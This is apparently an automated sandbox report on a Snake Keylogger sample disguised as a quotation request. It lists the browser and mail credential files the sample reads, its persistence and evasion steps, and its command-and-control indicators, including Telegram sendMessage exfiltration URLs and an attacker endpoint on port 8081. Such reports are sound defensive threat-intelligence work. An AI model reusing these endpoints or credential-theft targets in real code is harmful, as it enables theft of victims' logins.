                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS11
                Security Software Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559184 Sample: Request for Quotation MK FM... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 68 14 other signatures 2->68 8 Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe 7 2->8         started        12 jnqeRRexnD.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...\jnqeRRexnD.exe, PE32 8->38 dropped 40 C:\Users\...\jnqeRRexnD.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp2F66.tmp, XML 8->42 dropped 44 Request for Quotat...4.11.20.bat.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 jnqeRRexnD.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 28 WmiPrvSE.exe 14->28         started        30 conhost.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49737, 49767 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 158.101.44.242, 49708, 49712, 49715 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 188.114.96.3, 443, 49709, 49710 CLOUDFLARENETUS European Union 17->50 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe34%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe100%AviraHEUR/AGEN.1306899
                Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\jnqeRRexnD.exe100%AviraHEUR/AGEN.1306899
                C:\Users\user\AppData\Roaming\jnqeRRexnD.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\jnqeRRexnD.exe34%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.75false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabjnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icojnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.orgRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://chrome.google.com/webstore?hl=enlBsqjnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enjnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aborters.duckdns.org:8081Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.office.com/xRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:8081Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.75$Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20aRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.org/qRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.office.com/lBsqRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.orgRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRequest for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        188.114.96.3
                                                                                        reallyfreegeoip.orgEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        158.101.44.242
                                                                                        checkip.dyndns.comUnited States
                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1559184
                                                                                        Start date and time:2024-11-20 09:32:07 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 47s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:17
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Sample name:Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 75%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 200
                                                                                        • Number of non-executed functions: 9
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, PID 5268 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • VT rate limit hit for: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                        TimeTypeDescription
                                                                                        03:33:00API Interceptor8905308x Sleep call for process: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe modified
                                                                                        03:33:03API Interceptor32x Sleep call for process: powershell.exe modified
                                                                                        03:33:05API Interceptor6700425x Sleep call for process: jnqeRRexnD.exe modified
                                                                                        09:33:05Task SchedulerRun new task: jnqeRRexnD path: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                          e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                              Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            188.114.96.3A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.mydreamdeal.click/1ag2/
                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.questmatch.pro/ipd6/
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.rtpwslot888gol.sbs/jmkz/
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
